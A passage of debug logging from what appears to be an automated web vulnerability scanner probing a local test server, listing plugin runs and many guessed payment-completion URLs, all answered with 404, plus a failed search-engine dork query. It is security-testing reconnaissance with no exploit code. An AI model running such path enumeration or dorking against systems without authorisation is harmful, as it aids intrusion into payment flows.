password_profiling.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] click_jacking.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] lang.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] POST http://localhost:9090/module/validatepayment returned HTTP code "404" (id=2434,from_cache=0,grep=1,rtt=0.11,did=FVvWhZSq) [Wed Feb 12 09:40:49 2020 - debug] POST http://localhost:9090/inc/final.php5 returned HTTP code "404" (id=2436,from_cache=0,grep=1,rtt=0.31,did=aFP7bWud) [Wed Feb 12 09:40:49 2020 - debug] GET http://localhost:9090/libraries/pay.php3 returned HTTP code "404" (id=2435,from_cache=0,grep=1,rtt=0.16,did=egsMtpee) [Wed Feb 12 09:40:49 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] GET http://localhost:9090/includes/finished.php3 returned HTTP code "404" (id=2439,from_cache=0,grep=1,rtt=0.18,did=7xKdbblY) [Wed Feb 12 09:40:49 2020 - debug] POST http://localhost:9090/modules/payment.php5 returned HTTP code "404" (id=2438,from_cache=0,grep=1,rtt=0.18,did=FjmM5eMX) [Wed Feb 12 09:40:49 2020 - debug] GET http://localhost:9090/includes/validatepay.rb returned HTTP code "404" (id=2440,from_cache=0,grep=1,rtt=0.13,did=A5PtHEWC) [Wed Feb 12 09:40:49 2020 - debug] error_pages.grep(uri="http://localhost:9090/localhost.cab") took 0.25s to run [Wed Feb 12 09:40:49 2020 - debug] strange_reason.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] cache_control.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] strange_headers.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] ssn.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] oracle.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] feeds.grep(uri="http://localhost:9090/localhost.cab") took 0.00s to run [Wed Feb 12 09:40:49 2020 - debug] GET http://localhost:9090/libraries/validatepayment returned HTTP code "404" (id=2437,from_cache=0,grep=1,rtt=0.14,did=8bEXmDxh) [Wed Feb 12 09:40:50 2020 - debug] GET http://localhost:9090/inc/completepay.php4 returned HTTP code "404" (id=2444,from_cache=0,grep=1,rtt=0.20,did=G5rpoGdg) [Wed Feb 12 09:40:50 2020 - debug] POST http://localhost:9090/includes/trxcomplete.php5 returned HTTP code "404" (id=2441,from_cache=0,grep=1,rtt=0.14,did=Sl3agXxQ) [Wed Feb 12 09:40:50 2020 - debug] GET http://localhost:9090/includes/paymentcomplete.pl returned HTTP code "404" (id=2443,from_cache=0,grep=1,rtt=0.11,did=vM7GmvnJ) [Wed Feb 12 09:40:51 2020 - debug] GET http://localhost:9090/servlet/paymentsuccessful.php4 returned HTTP code "404" (id=2447,from_cache=0,grep=1,rtt=0.16,did=dux3J3HZ) [Wed Feb 12 09:40:51 2020 - debug] GET http://localhost:9090/inc/paymentsuccessful returned HTTP code "404" (id=2442,from_cache=0,grep=1,rtt=0.15,did=fXKvpALG) [Wed Feb 12 09:40:51 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 147. [Wed Feb 12 09:40:51 2020 - debug] POST http://localhost:9090/module/paymentsuccessful.php3 returned HTTP code "404" (id=2449,from_cache=0,grep=1,rtt=0.10,did=VlNOlKB9) [Wed Feb 12 09:40:51 2020 - debug] POST http://localhost:9090/includes/completepay.cgi returned HTTP code "404" (id=2446,from_cache=0,grep=1,rtt=0.10,did=75QGCEa1) [Wed Feb 12 09:40:51 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/localhost.cab") took 0.03s to run [Wed Feb 12 09:40:51 2020 - debug] url_session.grep(uri="http://localhost:9090/localhost.cab") took 0.50s to run [Wed Feb 12 09:40:51 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/localhost.cab") took 0.51s to run [Wed Feb 12 09:40:51 2020 - debug] POST http://localhost:9090/modules/pay.rb returned HTTP code "404" (id=2451,from_cache=0,grep=1,rtt=0.41,did=JxhPg1my) [Wed Feb 12 09:40:52 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/localhost.cab") took 0.49s to run [Wed Feb 12 09:40:52 2020 - debug] POST http://localhost:9090/module/valid.rb returned HTTP code "404" (id=2455,from_cache=0,grep=1,rtt=0.37,did=5osS63gV) [Wed Feb 12 09:40:52 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/localhost.cab") took 0.50s to run [Wed Feb 12 09:40:52 2020 - debug] POST http://localhost:9090/servlet/final.jsp returned HTTP code "404" (id=2453,from_cache=0,grep=1,rtt=0.47,did=EhJyVWaN) [Wed Feb 12 09:40:52 2020 - debug] POST http://localhost:9090/modules/transactioncomplete returned HTTP code "404" (id=2448,from_cache=0,grep=1,rtt=0.10,did=8XC30EkG) [Wed Feb 12 09:40:52 2020 - debug] GET http://localhost:9090/servlet/payment returned HTTP code "404" (id=2450,from_cache=0,grep=1,rtt=0.14,did=sLRkE9aq) [Wed Feb 12 09:40:52 2020 - debug] POST http://localhost:9090/modules/validpay returned HTTP code "404" (id=2457,from_cache=0,grep=1,rtt=0.29,did=xsn63SMg) [Wed Feb 12 09:40:52 2020 - debug] GET http://localhost:9090/includes/complete.php4 returned HTTP code "404" (id=2456,from_cache=0,grep=1,rtt=0.21,did=eS6e1sLB) [Wed Feb 12 09:40:53 2020 - debug] html_comments.grep(uri="http://localhost:9090/localhost.cab") took 0.52s to run [Wed Feb 12 09:40:53 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/localhost.cab") took 0.55s to run [Wed Feb 12 09:40:53 2020 - debug] GET http://localhost:9090/inc/validate.rb returned HTTP code "404" (id=2452,from_cache=0,grep=1,rtt=0.26,did=18px6I4R) [Wed Feb 12 09:40:53 2020 - debug] GET http://localhost:9090/modules/completepayment.php4 returned HTTP code "404" (id=2445,from_cache=0,grep=1,rtt=0.34,did=Z1ycB5ZU) [Wed Feb 12 09:40:53 2020 - debug] http_in_body.grep(uri="http://localhost:9090/localhost.cab") took 0.53s to run [Wed Feb 12 09:40:53 2020 - debug] GET http://localhost:9090/servlet/pay.cgi returned HTTP code "404" (id=2454,from_cache=0,grep=1,rtt=0.37,did=GiOU2EJA) [Wed Feb 12 09:40:53 2020 - debug] GET http://localhost:9090/module/success.rb returned HTTP code "404" (id=2460,from_cache=0,grep=1,rtt=0.19,did=K9ONMZOR) [Wed Feb 12 09:40:53 2020 - debug] GET http://localhost:9090/inc/complete.asp returned HTTP code "404" (id=2461,from_cache=0,grep=1,rtt=0.18,did=H4VoK7wx) [Wed Feb 12 09:40:53 2020 - debug] GET http://localhost:9090/servlet/successful.php4 returned HTTP code "404" (id=2458,from_cache=0,grep=1,rtt=0.57,did=6nBLlnwR) [Wed Feb 12 09:40:53 2020 - debug] POST http://localhost:9090/libraries/valid returned HTTP code "404" (id=2459,from_cache=0,grep=1,rtt=0.04,did=LBbgBoju) [Wed Feb 12 09:40:53 2020 - debug] POST http://localhost:9090/includes/validate returned HTTP code "404" (id=2462,from_cache=0,grep=1,rtt=0.19,did=8vTL3XsY) [Wed Feb 12 09:40:53 2020 - debug] GET http://localhost:9090/module/finished.cgi returned HTTP code "404" (id=2465,from_cache=0,grep=1,rtt=0.13,did=NQGfBG6o) [Wed Feb 12 09:40:53 2020 - debug] POST http://localhost:9090/inc/paymentsuccessful.cgi returned HTTP code "404" (id=2464,from_cache=0,grep=1,rtt=0.16,did=ewUU2Fok) [Wed Feb 12 09:40:53 2020 - debug] localhost:9090 connection pool stats (free:50 / in_use:2 / max:50 / total:52) [Wed Feb 12 09:40:53 2020 - debug] There are no connections marked as in use in the connection pool at this time [Wed Feb 12 09:40:53 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:53 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:53 2020 - debug] GET http://localhost:9090/module/validatepayment returned HTTP code "404" (id=2472,from_cache=0,grep=1,rtt=0.25,did=gBdi1RKC) [Wed Feb 12 09:40:53 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:53 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:54 2020 - debug] POST http://localhost:9090/modules/completepayment.php5 returned HTTP code "404" (id=2469,from_cache=0,grep=1,rtt=0.06,did=bQv7rmq9) [Wed Feb 12 09:40:54 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:54 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:54 2020 - debug] POST http://localhost:9090/inc/validate.php4 returned HTTP code "404" (id=2470,from_cache=0,grep=1,rtt=0.05,did=tTfvCEgY) [Wed Feb 12 09:40:54 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:54 2020 - debug] GET http://localhost:9090/inc/final.php5 returned HTTP code "404" (id=2471,from_cache=0,grep=1,rtt=0.23,did=rey2LY9Z) [Wed Feb 12 09:40:54 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:54 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:54 2020 - debug] POST http://localhost:9090/servlet/paymentsuccessful.php5 returned HTTP code "404" (id=2473,from_cache=0,grep=1,rtt=0.28,did=rhHqa9dN) [Wed Feb 12 09:40:54 2020 - debug] GET http://ajax.googleapis.com/ajax/services/search/web?q=site:localhost intitle:Linksys site:ourlinksys.com&start=0&rsz=8&v=1.0 returned HTTP code "200" (id=2467,from_cache=0,grep=1,rtt=1.36,did=MUb7xtX7) [Wed Feb 12 09:40:54 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:54 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:54 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:54 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:54 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:54 2020 - debug] POST http://localhost:9090/servlet/payment.cgi returned HTTP code "404" (id=2474,from_cache=0,grep=1,rtt=0.07,did=k26ryiml) [Wed Feb 12 09:40:54 2020 - debug] POST http://localhost:9090/includes/validatepay.php4 returned HTTP code "404" (id=2475,from_cache=0,grep=1,rtt=0.10,did=bwnqVM5I) [Wed Feb 12 09:40:54 2020 - debug] text_file.flush() took 0.00s to run [Wed Feb 12 09:40:54 2020 - debug] POST http://localhost:9090/includes/paymentcomplete.php3 returned HTTP code "404" (id=2468,from_cache=0,grep=1,rtt=0.33,did=X6Ad2UyT) [Wed Feb 12 09:40:54 2020 - debug] Invalid JSON format returned by Google, response status needs to be 200, got "The Google Web Search API is no longer available. Please migrate to the Google Custom Search API (https://developers.google.com/custom-search/)" instead. [Wed Feb 12 09:40:55 2020 - debug] GET http://localhost:9090/includes/completepay.cgi returned HTTP code "404" (id=2479,from_cache=0,grep=1,rtt=0.09,did=DjZBiZLo) [Wed Feb 12 09:40:55 2020 - debug] console.flush() took 0.00s to run [Wed Feb 12 09:40:55 2020 - debug] POST http://localhost:9090/libraries/validatepayment.cgi returned HTTP code "404" (id=2463,from_cache=0,grep=1,rtt=0.07,did=2F379gga) [Wed Feb 12 09:40:55 2020 - debug] POST http://localhost:9090/servlet/successful.php5 returned HTTP code "404" (id=2484,from_cache=0,grep=1,rtt=0.08,did=XwXuUvaW) [Wed Feb 12 09:40:55 2020 - debug] POST http://localhost:9090/inc/completepay.php5 returned HTTP code "404" (id=2466,from_cache=0,grep=1,rtt=0.22,did=AUzU7gjD) [Wed Feb 12 09:40:55 2020 - debug] GET http://localhost:9090/modules/transactioncomplete returned HTTP code "404" (id=2480,from_cache=0,grep=1,rtt=0.15,did=Wk3XkFn6) [Wed Feb 12 09:40:55 2020 - debug] symfony.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:55 2020 - debug] private_ip.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:55 2020 - debug] motw.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:55 2020 - debug] meta_generator.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:55 2020 - debug] expect_ct.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:55 2020 - debug] retirejs.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:55 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:55 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:55 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:40:55 2020 - debug] serialized_object.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:55 2020 - debug] blank_body.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:55 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:55 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:55 2020 - debug] GET http://localhost:9090/modules/validpay returned HTTP code "404" (id=2490,from_cache=0,grep=1,rtt=0.47,did=nNXJLOpY) [Wed Feb 12 09:40:55 2020 - debug] POST http://localhost:9090/module/success.php4 returned HTTP code "404" (id=2481,from_cache=0,grep=1,rtt=0.17,did=3Tme5DUy) [Wed Feb 12 09:40:55 2020 - debug] POST http://localhost:9090/inc/complete.py returned HTTP code "404" (id=2477,from_cache=0,grep=1,rtt=0.09,did=gc036awx) [Wed Feb 12 09:40:55 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:55 2020 - debug] POST http://localhost:9090/includes/complete.php5 returned HTTP code "404" (id=2483,from_cache=0,grep=1,rtt=0.15,did=wuPCBbgc) [Wed Feb 12 09:40:55 2020 - debug] GET http://localhost:9090/module/paymentsuccessful.php3 returned HTTP code "404" (id=2478,from_cache=0,grep=1,rtt=0.09,did=4G24fg2d) [Wed Feb 12 09:40:55 2020 - debug] POST http://localhost:9090/inc/final.php returned HTTP code "404" (id=2485,from_cache=0,grep=1,rtt=0.17,did=6hwLd4tN) [Wed Feb 12 09:40:56 2020 - debug] GET http://localhost:9090/includes/trxcomplete.php5 returned HTTP code "404" (id=2491,from_cache=0,grep=1,rtt=0.36,did=ygypIQ63) [Wed Feb 12 09:40:56 2020 - debug] svn_users.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:56 2020 - debug] csp.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:56 2020 - debug] dom_xss.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:56 2020 - debug] vulners_db.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:56 2020 - debug] GET http://localhost:9090/module/valid.rb returned HTTP code "404" (id=2487,from_cache=0,grep=1,rtt=0.09,did=tLFUjCV4) [Wed Feb 12 09:40:56 2020 - debug] credit_cards.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:56 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:56 2020 - debug] keys.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:56 2020 - debug] GET http://localhost:9090/libraries/valid returned HTTP code "404" (id=2492,from_cache=0,grep=1,rtt=0.26,did=DsvuS194) [Wed Feb 12 09:40:56 2020 - debug] GET http://localhost:9090/servlet/final.jsp returned HTTP code "404" (id=2493,from_cache=0,grep=1,rtt=0.40,did=dU5WuXKM) [Wed Feb 12 09:40:56 2020 - debug] file_upload.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:56 2020 - debug] clamav.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:56 2020 - debug] GET http://localhost:9090/modules/payment.php5 returned HTTP code "404" (id=2476,from_cache=0,grep=1,rtt=0.11,did=bHw05rOR) [Wed Feb 12 09:40:56 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:56 2020 - debug] POST http://localhost:9090/servlet/pay.asp returned HTTP code "404" (id=2488,from_cache=0,grep=1,rtt=0.10,did=9qlBZ2Pp) [Wed Feb 12 09:40:57 2020 - debug] POST http://localhost:9090/module/finished.asp returned HTTP code "404" (id=2489,from_cache=0,grep=1,rtt=0.07,did=zStIS2ii) [Wed Feb 12 09:40:57 2020 - debug] POST http://localhost:9090/module/validatepayment.cgi returned HTTP code "404" (id=2486,from_cache=0,grep=1,rtt=0.20,did=ZM7xZKNc) [Wed Feb 12 09:40:57 2020 - debug] websockets_links.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:57 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1101, 'reject-seen-url': 936, 'reject-out-of-scope': 27, 'accept': 211} [Wed Feb 12 09:40:57 2020 - debug] localhost:9090 connection pool stats (free:52 / in_use:1 / max:50 / total:53) [Wed Feb 12 09:40:57 2020 - debug] Connections with more in use time: (feefb3b1646a9d56, 0.09 sec) (084f56a9dda1c119, 0.03 sec) [Wed Feb 12 09:40:57 2020 - debug] GET http://localhost:9090/modules/pay.rb returned HTTP code "404" (id=2482,from_cache=0,grep=1,rtt=0.14,did=8d9QwyQQ) [Wed Feb 12 09:40:57 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:57 2020 - debug] objects.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:57 2020 - debug] error_500.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:57 2020 - debug] meta_tags.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:57 2020 - debug] password_profiling.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:57 2020 - debug] click_jacking.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:57 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:57 2020 - debug] lang.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:57 2020 - debug] GET http://localhost:9090/inc/paymentsuccessful.cgi returned HTTP code "404" (id=2496,from_cache=0,grep=1,rtt=0.29,did=wI31eE7a) [Wed Feb 12 09:40:57 2020 - debug] get_emails.grep(uri="http://localhost:9090/localhost.tgz") took 3.73s to run [Wed Feb 12 09:40:57 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:57 2020 - debug] GET http://localhost:9090/modules/completepayment.php5 returned HTTP code "404" (id=2494,from_cache=0,grep=1,rtt=0.13,did=vi0QzLuK) [Wed Feb 12 09:40:57 2020 - debug] GET http://localhost:9090/includes/validate returned HTTP code "404" (id=2495,from_cache=0,grep=1,rtt=0.25,did=7yGf5L8W) [Wed Feb 12 09:40:57 2020 - debug] error_pages.grep(uri="http://localhost:9090/localhost.7z") took 0.08s to run [Wed Feb 12 09:40:57 2020 - debug] strange_reason.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:57 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:57 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:57 2020 - debug] cache_control.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:57 2020 - debug] POST http://localhost:9090/includes/completepay.asp returned HTTP code "404" (id=2497,from_cache=0,grep=1,rtt=0.28,did=GJrZcF0y) [Wed Feb 12 09:40:57 2020 - debug] http_in_body.grep(uri="http://localhost:9090/localhost.7z") took 0.73s to run [Wed Feb 12 09:40:57 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/localhost.7z") took 0.56s to run [Wed Feb 12 09:40:57 2020 - debug] strange_headers.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:57 2020 - debug] html_comments.grep(uri="http://localhost:9090/localhost.7z") took 0.36s to run [Wed Feb 12 09:40:57 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/localhost.7z") took 0.36s to run [Wed Feb 12 09:40:57 2020 - debug] url_session.grep(uri="http://localhost:9090/localhost.7z") took 0.28s to run [Wed Feb 12 09:40:58 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/localhost.7z") took 0.40s to run [Wed Feb 12 09:40:58 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/localhost.7z") took 0.42s to run [Wed Feb 12 09:40:58 2020 - debug] POST http://localhost:9090/modules/validpay.cgi returned HTTP code "404" (id=2501,from_cache=0,grep=1,rtt=0.17,did=YIAOciEW) [Wed Feb 12 09:40:58 2020 - debug] get_emails.grep(uri="http://localhost:9090/localhost.cab") took 2.57s to run [Wed Feb 12 09:40:58 2020 - debug] ssn.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:58 2020 - debug] oracle.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:58 2020 - debug] feeds.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:58 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/localhost.7z") took 0.00s to run [Wed Feb 12 09:40:58 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 146. [Wed Feb 12 09:40:58 2020 - debug] www.google.com:80 connection pool stats (free:14 / in_use:0 / max:50 / total:14) [Wed Feb 12 09:40:58 2020 - debug] There are no connections marked as in use in the connection pool at this time [Wed Feb 12 09:40:58 2020 - debug] POST http://localhost:9090/module/transactioncomplete returned HTTP code "404" (id=2499,from_cache=0,grep=1,rtt=0.15,did=tn9xQ6Np) [Wed Feb 12 09:40:58 2020 - debug] GET http://localhost:9090/servlet/paymentsuccessful.php5 returned HTTP code "404" (id=2498,from_cache=0,grep=1,rtt=0.08,did=fuTtMnx0) [Wed Feb 12 09:40:58 2020 - debug] GET http://localhost:9090/includes/paymentcomplete.php3 returned HTTP code "404" (id=2504,from_cache=0,grep=1,rtt=0.20,did=e7zUBbCa) [Wed Feb 12 09:40:58 2020 - debug] GET http://localhost:9090/libraries/validatepayment.cgi returned HTTP code "404" (id=2503,from_cache=0,grep=1,rtt=0.23,did=iavf2xOj) [Wed Feb 12 09:40:58 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 09:40:58 2020 - debug] symfony.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:40:58 2020 - debug] file_upload.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:40:58 2020 - debug] expect_ct.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:40:58 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:40:58 2020 - debug] private_ip.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:40:58 2020 - debug] GET http://localhost:9090/inc/completepay.php5 returned HTTP code "404" (id=2505,from_cache=0,grep=1,rtt=0.29,did=KbJYRzJr) [Wed Feb 12 09:40:58 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1114, 'reject-seen-url': 948, 'reject-out-of-scope': 27, 'accept': 211} [Wed Feb 12 09:40:58 2020 - debug] svn_users.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:40:58 2020 - debug] GET http://localhost:9090/servlet/successful.php5 returned HTTP code "404" (id=2506,from_cache=0,grep=1,rtt=0.29,did=Opqn1amD) [Wed Feb 12 09:40:59 2020 - debug] GET http://localhost:9090/includes/validatepay.php4 returned HTTP code "404" (id=2507,from_cache=0,grep=1,rtt=0.23,did=Gx5vYLcp) [Wed Feb 12 09:40:59 2020 - debug] POST http://localhost:9090/includes/trxcomplete.php returned HTTP code "404" (id=2509,from_cache=0,grep=1,rtt=0.28,did=pRznryqD) [Wed Feb 12 09:40:59 2020 - debug] GET http://localhost:9090/includes/complete.php5 returned HTTP code "404" (id=2510,from_cache=0,grep=1,rtt=0.13,did=FYXqIhRg) [Wed Feb 12 09:40:59 2020 - debug] POST http://localhost:9090/module/valid.php4 returned HTTP code "404" (id=2511,from_cache=0,grep=1,rtt=0.21,did=UQGj5RGB) [Wed Feb 12 09:40:59 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:40:59 2020 - debug] motw.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:40:59 2020 - debug] meta_generator.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:40:59 2020 - debug] retirejs.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:40:59 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:40:59 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:40:59 2020 - debug] blank_body.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:40:59 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:40:59 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:40:59 2020 - debug] credit_cards.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:40:59 2020 - debug] websockets_links.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:00 2020 - debug] csp.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:00 2020 - debug] dom_xss.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:00 2020 - debug] vulners_db.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:00 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:00 2020 - debug] keys.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:00 2020 - debug] clamav.grep(uri="http://localhost:9090/localhost.bzip2") took 0.00s to run [Wed Feb 12 09:41:00 2020 - debug] GET http://localhost:9090/servlet/payment.cgi returned HTTP code "404" (id=2514,from_cache=0,grep=1,rtt=0.30,did=fOcvaBXF) [Wed Feb 12 09:41:00 2020 - debug] POST http://localhost:9090/modules/completepayment.php returned HTTP code "404" (id=2516,from_cache=0,grep=1,rtt=0.17,did=kvzBwBYQ) [Wed Feb 12 09:41:00 2020 - debug] POST http://localhost:9090/modules/payment.php returned HTTP code "404" (id=2515,from_cache=0,grep=1,rtt=0.29,did=7kYjcCVo) [Wed Feb 12 09:41:01 2020 - debug] POST http://localhost:9090/modules/pay.php4 returned HTTP code "404" (id=2519,from_cache=0,grep=1,rtt=0.31,did=4Pji3OiN) [Wed Feb 12 09:41:01 2020 - debug] GET http://localhost:9090/module/validatepayment.cgi returned HTTP code "404" (id=2522,from_cache=0,grep=1,rtt=0.07,did=XcESmji3) [Wed Feb 12 09:41:01 2020 - debug] GET http://localhost:9090/inc/final.php returned HTTP code "404" (id=2518,from_cache=0,grep=1,rtt=0.28,did=t44Ll20k) [Wed Feb 12 09:41:01 2020 - debug] GET http://localhost:9090/servlet/pay.asp returned HTTP code "404" (id=2523,from_cache=0,grep=1,rtt=0.13,did=R56zhuj7) [Wed Feb 12 09:41:01 2020 - debug] GET http://localhost:9090/inc/validate.php4 returned HTTP code "404" (id=2502,from_cache=0,grep=1,rtt=0.32,did=242VYY3S) [Wed Feb 12 09:41:01 2020 - debug] GET http://localhost:9090/modules/validpay.cgi returned HTTP code "404" 